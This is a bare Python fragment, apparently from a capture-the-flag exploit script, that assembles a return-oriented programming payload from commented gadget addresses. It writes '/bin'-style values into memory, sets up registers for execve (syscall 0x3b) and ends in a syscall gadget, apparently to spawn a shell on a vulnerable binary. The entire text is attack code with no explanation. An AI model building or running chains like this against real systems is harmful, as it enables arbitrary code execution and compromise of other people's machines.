payload = p64(0x402af3)
#0x0000000000402af3: pop rbx; pop rbp; ret; 
payload += p64(0x80)+p64(0x409230)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x402af3)
# 0x0000000000402af3: pop rbx; pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x4090ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x402af3)
# 0x0000000000402af3: pop rbx; pop rbp; ret; 
payload += p64(0x68662f)+p64(0x4090b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x409070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x402af3)
# 0x0000000000402af3: pop rbx; pop rbp; ret; 
payload += p64(0x36b09008)+p64(0x0)+p64(0x402af1)
# 0x0000000000402af1: mov eax, ebx; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x401553)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x402af3)
# 0x0000000000402af3: pop rbx; pop rbp; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x402af1)
# 0x0000000000402af1: mov eax, ebx; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4033df)
# 0x00000000004033df: syscall; 
payload += b''
